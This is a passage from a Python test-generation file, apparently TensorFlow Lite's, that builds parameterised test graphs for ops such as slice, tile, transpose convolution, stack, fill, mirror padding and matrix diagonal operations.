"input_dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [5], []],
}]
def build_graph(parameters):
"""Build the neg op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.negative(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [values], sess.run(outputs, feed_dict=dict(zip(inputs, [values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_zeros_like_tests(options):
"""Make a set of tests to do zeros_like."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the zeros_like op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
zeros = tf.zeros_like(input_tensor)
# This maximum node is so that toco can perform the constants-propagation
# through the above zeros_like, which it can't do if the output of the
# zeros_like as an output of the whole graphs (graph outputs can't be
# constants). If toco does not perform such constants-propagation then
# the resulting tflite graph retains the zeros_like as a Fill op, which
# is unsupported by TFLite, even as a custom op.
out = tf.maximum(zeros, input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [values], sess.run(outputs, feed_dict=dict(zip(inputs, [values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
def _make_elementwise_tests(op):
"""Make a set of tests to do element-wise operations."""
def f(options):
"""Actual function that generates examples."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [1], [1, 2], [5, 6, 7, 8], [3, 4, 5, 6]],
}]
def build_graph(parameters):
"""Build the unary op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape"])
out = op(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict={inputs[0]: input_value})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
return f
@register_make_test_function()
def make_sin_tests(options):
"""Make a set of tests to do sin."""
return _make_elementwise_tests(tf.sin)(options)
@register_make_test_function()
def make_log_tests(options):
"""Make a set of tests to do log."""
return _make_elementwise_tests(tf.log)(options)
@register_make_test_function()
def make_sqrt_tests(options):
"""Make a set of tests to do sqrt."""
return _make_elementwise_tests(tf.sqrt)(options)
@register_make_test_function()
def make_rsqrt_tests(options):
"""Make a set of tests to do 1/sqrt."""
return _make_elementwise_tests(tf.rsqrt)(options)
@register_make_test_function()
def make_square_tests(options):
"""Make a set of tests to do square."""
return _make_elementwise_tests(tf.square)(options)
@register_make_test_function()
def make_where_tests(options):
"""Make a set of tests to do where."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape_set": [([1, 2, 3, 4], [1, 2, 3, 4]),],
}]
def build_graph(parameters):
"""Build the where op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_set"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input3",
shape=parameters["input_shape_set"][1])
less = tf.less(input_value1, input_value2)
out = tf.where(less, input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_set"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_set"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_slice_tests(options):
"""Make a set of tests to do slice."""
# TODO(renjieliu): add test/support for uint8.
test_parameters = [
# 4-D
{
"dtype": [tf.float32, tf.int32, tf.int64, tf.string],
"index_type": [tf.int32, tf.int64],
"input_shape": [[12, 2, 2, 5]],
"begin": [[0, 0, 0, 0], [1, 0, 1, 0]],
"size": [[8, 2, 2, 3], [11, 2, 1, 5]],
},
# 2-D
{
"dtype": [tf.float32, tf.int32, tf.int64, tf.string],
"index_type": [tf.int32, tf.int64],
"input_shape": [[2, 3]],
"begin": [[0, 0], [1, 0]],
"size": [[2, 3], [2, 2]],
},
# 4-D with size -1
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[4, 4, 4, 4]],
"begin": [[0, 0, 0, 0], [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0],
[0, 0, 0, 1]],
"size": [[-1, 1, 1, 1], [1, -1, 1, 1], [1, 1, -1, 1], [1, 1, 1, -1]],
},
]
def build_graph(parameters):
"""Build graph for slice test."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
begin = tf.placeholder(
dtype=parameters["index_type"],
name="begin",
shape=[len(parameters["input_shape"])])
size = tf.placeholder(
dtype=parameters["index_type"],
name="size",
shape=[len(parameters["input_shape"])])
tensors = [input_tensor, begin, size]
out = tf.slice(input_tensor, begin, size)
return tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build inputs for slice test."""
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
index_type = _TF_TYPE_INFO[parameters["index_type"]][0]
begin_values = np.array(parameters["begin"]).astype(index_type)
size_values = np.array(parameters["size"]).astype(index_type)
values = [input_values, begin_values, size_values]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=24)
@register_make_test_function()
def make_conv2d_transpose_tests(options):
"""Make a set of tests to do transpose_conv."""
test_parameters = [{
"input_shape": [[1, 50, 54, 3]],
"filter_shape": [[1, 1, 8, 3], [1, 2, 8, 3], [1, 3, 8, 3], [1, 4, 8, 3]],
"output_shape": [[1, 100, 108, 8]],
"dynamic_output_shape": [True, False],
}, {
"input_shape": [[1, 16, 1, 512]],
"filter_shape": [[4, 1, 512, 512]],
"output_shape": [[1, 32, 1, 512]],
"dynamic_output_shape": [True, False],
}, {
"input_shape": [[1, 128, 128, 1]],
"filter_shape": [[4, 4, 1, 1]],
"output_shape": [[1, 256, 256, 1]],
"dynamic_output_shape": [True, False],
}]
def build_graph(parameters):
"""Build a transpose_conv graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
filter_tensor = tf.placeholder(
dtype=tf.float32, name="filter", shape=parameters["filter_shape"])
input_tensors = [input_tensor, filter_tensor]
if parameters["dynamic_output_shape"]:
output_shape = tf.placeholder(dtype=tf.int32, shape=[4])
input_tensors.append(output_shape)
else:
output_shape = parameters["output_shape"]
out = tf.nn.conv2d_transpose(
input_tensor,
filter_tensor,
output_shape=output_shape,
padding="SAME",
strides=(1, 2, 2, 1))
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(np.float32, parameters["input_shape"]),
create_tensor_data(np.float32, parameters["filter_shape"])
]
if parameters["dynamic_output_shape"]:
values.append(np.array(parameters["output_shape"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# Since compute output_shape is fairly complicated for
# tf.nn.conv2d_transpose input_sizes argument, so we here first perform a
# "conv2d" operation to get the output, then we use the output to feed in
# tf.nn.conv2d_backprop_input.
# This test will depend on the "conv2d" operation's correctness.
@register_make_test_function()
def make_transpose_conv_tests(options):
"""Make a set of tests to do transpose_conv."""
# Tensorflow only supports equal strides
test_parameters = [{
"input_shape": [[1, 3, 4, 1], [1, 10, 10, 3], [3, 20, 20, 1]],
"filter_size": [[1, 1], [1, 2], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 3, 3, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"],
"channel_multiplier": [1, 2],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_size"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a transpose_conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
filter_input = tf.placeholder(
dtype=tf.float32, name="filter", shape=filter_shape)
conv_outputs = tf.nn.conv2d(
input_tensor,
filter_input,
strides=parameters["strides"],
padding=parameters["padding"],
data_format=parameters["data_format"])
out = tf.nn.conv2d_backprop_input(
input_shape,
filter_input,
conv_outputs,
strides=parameters["strides"],
padding=parameters["padding"],
data_format=parameters["data_format"])
input_tensors = [input_tensor, filter_input]
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
input_shape, filter_shape = get_tensor_shapes(parameters)
values = [
create_tensor_data(np.float32, input_shape),
create_tensor_data(np.float32, filter_shape)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_tile_tests(options):
"""Make a set of tests to do tile."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.bool],
"input_shape": [[3, 2, 1], [2, 2, 2]],
"multiplier_dtype": [tf.int32, tf.int64],
"multiplier_shape": [[3]]
}]
def build_graph(parameters):
"""Build the tile op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
shape=parameters["input_shape"],
name="input")
multiplier_value = tf.placeholder(
dtype=parameters["multiplier_dtype"],
shape=parameters["multiplier_shape"],
name="multiplier")
out = tf.tile(input_value, multiplier_value)
return [input_value, multiplier_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
multipliers_value = create_tensor_data(
parameters["multiplier_dtype"],
parameters["multiplier_shape"],
min_value=0)
return [input_value, multipliers_value], sess.run(
outputs,
feed_dict={
inputs[0]: input_value,
inputs[1]: multipliers_value
})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_expand_dims_tests(options):
"""Make a set of tests to do expand_dims."""
test_parameters = [{
"input_type": [tf.float32, tf.int32],
"input_shape": [[5, 4]],
"axis_value": [0, 1, 2, -1, -2, -3],
"constant_axis": [True, False],
}]
def build_graph(parameters):
"""Build the where op testing graph."""
inputs = []
input_value = tf.placeholder(
dtype=parameters["input_type"],
name="input",
shape=parameters["input_shape"])
inputs.append(input_value)
if parameters["constant_axis"]:
axis_value = tf.constant(
parameters["axis_value"], dtype=tf.int32, shape=[1])
else:
axis_value = tf.placeholder(dtype=tf.int32, name="axis", shape=[1])
inputs.append(axis_value)
out = tf.expand_dims(input_value, axis=axis_value)
return inputs, [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = []
input_values.append(
create_tensor_data(parameters["input_type"], parameters["input_shape"]))
if not parameters["constant_axis"]:
input_values.append(np.array([parameters["axis_value"]], dtype=np.int32))
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_sparse_to_dense_tests(options):
"""Make a set of tests to do sparse to dense."""
test_parameters = [{
"value_dtype": [tf.float32, tf.int32, tf.int64],
"index_dtype": [tf.int32, tf.int64],
"value_count": [1, 3, 6, 8],
"dense_shape": [[15], [3, 10], [4, 4, 4, 4], [7, 10, 9]],
"default_value": [0, -1],
"value_is_scalar": [True, False],
}]
# Return a single value for 1-D dense shape, but a tuple for other shapes.
def generate_index(dense_shape):
if len(dense_shape) == 1:
return np.random.randint(dense_shape[0])
else:
index = []
for shape in dense_shape:
index.append(np.random.randint(shape))
return tuple(index)
def build_graph(parameters):
"""Build the sparse_to_dense op testing graph."""
dense_shape = parameters["dense_shape"]
# Special handle for value_is_scalar case.
# value_count must be 1.
if parameters["value_is_scalar"] and parameters["value_count"] == 1:
value = tf.placeholder(
name="value", dtype=parameters["value_dtype"], shape=())
else:
value = tf.placeholder(
name="value",
dtype=parameters["value_dtype"],
shape=[parameters["value_count"]])
indices = set()
while len(indices) < parameters["value_count"]:
indices.add(generate_index(dense_shape))
indices = tf.constant(tuple(indices), dtype=parameters["index_dtype"])
# TODO(renjieliu): Add test for validate_indices case.
out = tf.sparse_to_dense(
indices,
dense_shape,
value,
parameters["default_value"],
validate_indices=False)
return [value], [out]
def build_inputs(parameters, sess, inputs, outputs):
if parameters["value_is_scalar"] and parameters["value_count"] == 1:
input_value = create_scalar_data(parameters["value_dtype"])
else:
input_value = create_tensor_data(parameters["value_dtype"],
[parameters["value_count"]])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_pack_tests(options):
"""Make a set of tests to do stack."""
test_parameters = [
# Avoid creating all combinations to keep the test size small.
{
"dtype": [tf.float32],
"base_shape": [[3, 4, 3], [3, 4], [5]],
"num_tensors": [1, 2, 3, 4, 5, 6],
"axis": [0, 1, 2, 3],
"additional_shape": [1, 2, 3],
},
{
"dtype": [tf.int32],
"base_shape": [[3, 4, 3], [3, 4], [5]],
"num_tensors": [6],
"axis": [0, 1, 2, 3],
"additional_shape": [1, 2, 3],
},
{
"dtype": [tf.int64],
"base_shape": [[3, 4, 3], [3, 4], [5]],
"num_tensors": [5],
"axis": [0, 1, 2, 3],
"additional_shape": [1, 2, 3],
}
]
def get_shape(parameters):
"""Return a tweaked version of 'base_shape'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
if axis < len(shape):
shape[axis] += parameters["additional_shape"]
return shape
def build_graph(parameters):
all_tensors = []
for n in range(0, parameters["num_tensors"]):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name=("input%d" % n),
shape=get_shape(parameters))
all_tensors.append(input_tensor)
out = tf.stack(all_tensors, parameters["axis"])
return all_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
all_values = []
for _ in range(0, parameters["num_tensors"]):
input_values = create_tensor_data(np.float32, get_shape(parameters))
all_values.append(input_values)
return all_values, sess.run(
outputs, feed_dict=dict(zip(inputs, all_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=72)
@register_make_test_function()
def make_unpack_tests(options):
"""Make a set of tests to do unstack."""
test_parameters = [{
"base_shape": [[3, 4, 3], [3, 4], [5, 6, 7, 8]],
"axis": [0, 1, 2, 3],
}]
def get_valid_axis(parameters):
"""Return a tweaked version of 'axis'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
while axis > len(shape) - 1:
axis -= 1
return axis
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name=("input"), shape=parameters["base_shape"])
outs = tf.unstack(input_tensor, axis=get_valid_axis(parameters))
return [input_tensor], [outs[0]]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(np.float32, shape=parameters["base_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_range_tests(options):
"""Make a set of tests to do range."""
test_parameters = [{
"dtype": [tf.int32, tf.float32],
"offset": [10, 100, 1000],
"delta": [1, 2, 3, 4, -1, -2, -3, -4],
}]
def build_graph(parameters):
"""Build the range op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"], name=("start"), shape=[])
if parameters["delta"] < 0:
offset = parameters["offset"] * -1
else:
offset = parameters["offset"]
delta = parameters["delta"]
limit_tensor = input_tensor + offset
delta_tensor = tf.constant(delta, dtype=parameters["dtype"])
out = tf.range(input_tensor, limit_tensor, delta_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_scalar_data(parameters["dtype"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_fill_tests(options):
"""Make a set of tests to do fill."""
test_parameters = [{
"dims_dtype": [tf.int32, tf.int64],
"dims_shape": [[], [1], [3], [3, 3]],
"value_dtype": [tf.int32, tf.int64, tf.float32],
}]
def build_graph(parameters):
"""Build the fill op testing graph."""
input1 = tf.placeholder(
dtype=parameters["dims_dtype"],
name="dims",
shape=parameters["dims_shape"])
input2 = tf.placeholder(
dtype=parameters["value_dtype"], name="value", shape=[])
out = tf.fill(input1, input2)
return [input1, input2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input1 = create_tensor_data(parameters["dims_dtype"],
parameters["dims_shape"], 1)
input2 = create_scalar_data(parameters["value_dtype"])
return [input1, input2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input1, input2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=12)
def _make_logical_tests(op):
"""Make a set of tests to do logical operations."""
def logical(options, expected_tf_failures=0):
"""Generate examples."""
test_parameters = [{
"input_shape_pair": [([], []), ([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the logical testing graph."""
input_value1 = tf.placeholder(
dtype=tf.bool, name="input1", shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=tf.bool, name="input2", shape=parameters["input_shape_pair"][1])
out = op(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(tf.bool,
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(tf.bool,
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
return logical
@register_make_test_function()
def make_logical_or_tests(options):
"""Make a set of tests to do logical_or."""
return _make_logical_tests(tf.logical_or)(options, expected_tf_failures=1)
@register_make_test_function()
def make_logical_and_tests(options):
"""Make a set of tests to do logical_and."""
return _make_logical_tests(tf.logical_and)(options, expected_tf_failures=1)
@register_make_test_function()
def make_logical_xor_tests(options):
"""Make a set of tests to do logical_xor.
Test logical_not as well.
"""
return _make_logical_tests(tf.logical_xor)(options, expected_tf_failures=1)
@register_make_test_function()
def make_mirror_pad_tests(options):
"""Make a set of tests to do mirror_pad."""
test_parameters = [
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [2, 1]]],
"mode": ["REFLECT"],
"type": ["const"]
},
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [1, 1]]],
"mode": ["REFLECT"],
"type": ["const"]
},
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [2, 1]]],
"mode": ["SYMMETRIC"],
"type": ["placeholder"]
},
{
"input_shape": [[2, 3]],
"padding_matrix": [[[1, 1], [2, 1]]],
"mode": ["REFLECT"],
"type": ["placeholder"]
},
{
"input_shape": [[3]],
"padding_matrix": [[[0, 2]]],
"mode": ["SYMMETRIC"],
"type": ["placeholder"]
},
{
"input_shape": [[3]],
"padding_matrix": [[[0, 2]]],
"mode": ["SYMMETRIC"],
"type": ["const"]
},
{
"input_shape": [[3]],
"padding_matrix": [[[0, 2]]],
"mode": ["REFLECT"],
"type": ["const"]
},
{
"input_shape": [[3, 2, 4, 5]],
"padding_matrix": [[[1, 1], [2, 2], [1, 1], [1, 1]]],
"mode": ["SYMMETRIC"],
"type": ["placeholder"]
},
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.int32, name="input", shape=parameters["input_shape"])
if parameters["type"] != "const":
padding_matrix = tf.placeholder(
dtype=tf.int32,
name="padding",
shape=[len(parameters["input_shape"]), 2])
input_tensors = [input_tensor, padding_matrix]
else:
padding_matrix = tf.constant(np.array(parameters["padding_matrix"]))
input_tensors = [input_tensor]
output = tf.pad(
input_tensor, paddings=padding_matrix, mode=parameters["mode"])
return input_tensors, [output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = [create_tensor_data(tf.int32, parameters["input_shape"])]
if parameters["type"] != "const":
input_values.append(np.array(parameters["padding_matrix"]))
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_unroll_batch_matmul_tests(options):
"""Make a set of tests to test unroll_batch_matmul."""
# The test cases below requires broadcasting support (BatchMatMulV2 semantic),
# whis isn't supported as of this change.
broadcast_shape_params = [
# Simple broadcast.
[(1, 2, 3), (3, 5), False, False],
# Empty batch broadcast.
[(2, 5, 3), (3, 7), False, False],
# Single batch with non-empty batch broadcast.
[(1, 5, 3), (4, 3, 7), False, False],
# Broadcast both operands
[(3, 1, 5, 3), (1, 4, 3, 7), False, False],
]
test_parameters = [{
"dtype": [tf.float32],
"shape": [
[(2, 2, 3), (2, 3, 2), False, False],
[(2, 2, 3), (2, 3, 2), True, True],
[(2, 2, 3), (2, 2, 3), False, True],
[(2, 2, 3), (2, 2, 3), True, False],
[(4, 2, 2, 3), (4, 2, 3, 2), False, False],
[(4, 2, 2, 3), (4, 2, 3, 2), True, True],
[(4, 2, 2, 3), (4, 2, 2, 3), False, True],
[(4, 2, 2, 3), (4, 2, 2, 3), True, False]
] + broadcast_shape_params,
# TODO(b/130887442): Improve the forward compatibility tests for every
# ops.
"forward_compatibility_test": [False, True],
}]
def build_graph(parameters):
"""Build the batch_matmul op testing graph."""
def _build_graph():
input_tensor1 = tf.placeholder(
dtype=parameters["dtype"], shape=parameters["shape"][0])
input_tensor2 = tf.placeholder(
dtype=parameters["dtype"], shape=parameters["shape"][1])
# Should be unrolled and replaced with fully_connected ops in the end.
out = tf.matmul(
input_tensor1,
input_tensor2,
transpose_a=parameters["shape"][2],
transpose_b=parameters["shape"][3])
return [input_tensor1, input_tensor2], [out]
if parameters["forward_compatibility_test"]:
# This is hardcoded to the date after MatMulV2 is activated.
# TODO(b/130887442): Improve the forward compatibility tests for every
# ops, and remove the hardcoded date.
with tf.compat.forward_compatibility_horizon(2019, 4, 26):
return _build_graph()
else:
return _build_graph()
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(
parameters["dtype"], shape=parameters["shape"][0])
input_value2 = create_tensor_data(
parameters["dtype"], shape=parameters["shape"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_placeholder_with_default_tests(options):
"""Make a set of tests to test placeholder_with_default."""
test_parameters = [{
"dtype": [tf.float32, tf.int32, tf.int64],
}]
def build_graph(parameters):
"""Build the placeholder_with_default testing graph."""
const_node = tf.constant(
[1, 2, 2, 0], shape=[2, 2], dtype=parameters["dtype"])
input_tensor = tf.placeholder_with_default(
const_node, shape=[2, 2], name="input")
out = tf.equal(input_tensor, const_node, name="output")
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
numpy_type = _TF_TYPE_INFO[parameters["dtype"]][0]
input_value = np.array([[1, 0], [2, 1]], numpy_type)
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_unique_tests(options):
"""Make a set of tests for Unique op."""
test_parameters = [
{
"input_shape": [[1]],
"index_type": [tf.int32, tf.int64, None],
"input_values": [3]
},
{
"input_shape": [[5]],
"index_type": [tf.int32, tf.int64],
"input_values": [[3, 2, 1, 2, 3]]
},
{
"input_shape": [[7]],
"index_type": [tf.int32, tf.int64],
"input_values": [[1, 1, 1, 1, 1, 1, 1]]
},
{
"input_shape": [[5]],
"index_type": [tf.int32, tf.int64],
"input_values": [[3, 2, 1, 0, -1]]
}]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.int32, name="input", shape=parameters["input_shape"])
if parameters["index_type"] is None:
output = tf.unique(input_tensor)
else:
output = tf.unique(input_tensor, parameters["index_type"])
return [input_tensor], output
def build_inputs(parameters, sess, inputs, outputs):
input_values = [create_tensor_data(tf.int32, parameters["input_shape"])]
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_reverse_v2_tests(options):
"""Make a set of tests to do reverse_v2."""
test_parameters = [{
"base_shape": [[3, 4, 3], [3, 4], [5, 6, 7, 8]],
"axis": [0, 1, 2, 3],
}]
def get_valid_axis(parameters):
"""Return a tweaked version of 'axis'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
while axis > len(shape) - 1:
axis -= 1
return axis
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name=("input"), shape=parameters["base_shape"])
outs = tf.reverse(input_tensor, axis=[get_valid_axis(parameters)])
return [input_tensor], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(np.float32, shape=parameters["base_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_reverse_sequence_tests(options):
"""Make a set of tests to do reverse_sequence."""
test_parameters = [
{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape": [[8, 4, 5, 5, 6], [4, 4, 3, 5]],
"seq_lengths": [[2, 2, 2, 2], [2, 1, 1, 0]],
"seq_axis": [0, 3],
"batch_axis": [1]
},
{
"input_dtype": [tf.float32],
"input_shape": [[2, 4, 5, 5, 6]],
"seq_lengths": [[2, 1]],
"seq_axis": [2],
"batch_axis": [0]
},
{
"input_dtype": [tf.float32],
"input_shape": [[4, 2]],
"seq_lengths": [[3, 1]],
"seq_axis": [0],
"batch_axis": [1]
}]
def build_graph(parameters):
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
outs = tf.reverse_sequence(
input_value,
seq_lengths=parameters["seq_lengths"],
batch_axis=parameters["batch_axis"],
seq_axis=parameters["seq_axis"])
return [input_value], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_matrix_diag_tests(options):
"""Make a set of tests for tf.linalg.diag op."""
test_parameters = [
{
"input_shape": [[3], [2, 3], [3, 4, 5], [2, 4, 6, 8]],
"input_dtype": [tf.int32, tf.float32],
},
]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
outs = tf.matrix_diag(input_tensor)
return [input_tensor], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_matrix_set_diag_tests(options):
"""Make a set of tests for tf.linalg.set_diag op."""
test_parameters = [
{
"input_diag_shapes": [([3, 3], [3]), ([2, 3], [2]), ([2, 4, 4],
[2, 4]),
([3, 4, 5, 6], [3, 4, 5])],
"input_dtype": [tf.int32, tf.float32, tf.uint8],
},
]
def build_graph(parameters):
input_shape = parameters["input_diag_shapes"][0]
diag_shape = parameters["input_diag_shapes"][1]
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"], name="input", shape=input_shape)
diag_tensor = tf.placeholder(
dtype=parameters["input_dtype"], name="diagonal", shape=diag_shape)
outs = tf.matrix_set_diag(input_tensor, diag_tensor)
return [input_tensor, diag_tensor], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_shape = parameters["input_diag_shapes"][0]
diag_shape = parameters["input_diag_shapes"][1]
input_values = create_tensor_data(parameters["input_dtype"], input_shape)
diag_values = create_tensor_data(parameters["input_dtype"], diag_shape)
return [input_values, diag_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values, diag_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_eye_tests(options):
"""Make a set of tests for tf.eye op."""
test_parameters = [{
"num_rows_shape": [[]],
"num_cols_shape": [[]],
"batch_shape": [[3], [2, 4], [4, 5, 6], None],
"use_num_cols": [True, False],
"dtype": [tf.float32, tf.int32],
}]
def build_graph(parameters):
input_tensor0 = tf.placeholder(
dtype=tf.int32, name="num_rows", shape=parameters["num_rows_shape"])
input_tensor1 = tf.placeholder(
dtype=tf.int32, name="num_columns", shape=parameters["num_cols_shape"])
if parameters["use_num_cols"]:
outs = tf.eye(
num_rows=input_tensor0,
num_columns=input_tensor1,
batch_shape=parameters["batch_shape"],
dtype=parameters["dtype"])
return [input_tensor0, input_tensor1], [outs]
else:
outs = tf.eye(num_rows=input_tensor0, dtype=parameters["dtype"])
return [input_tensor0], [outs]
def build_inputs(parameters, sess, inputs, outputs):
input_value0 = create_scalar_data(dtype=np.int32, min_value=1)
input_value1 = create_scalar_data(dtype=np.int32, min_value=1)
if parameters["use_num_cols"]:
return [input_value0, input_value1], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value0, input_value1])))
else:
return [input_value0], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value0])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function(name="make_unidirectional_sequence_lstm_tests")
@test_util.enable_control_flow_v2
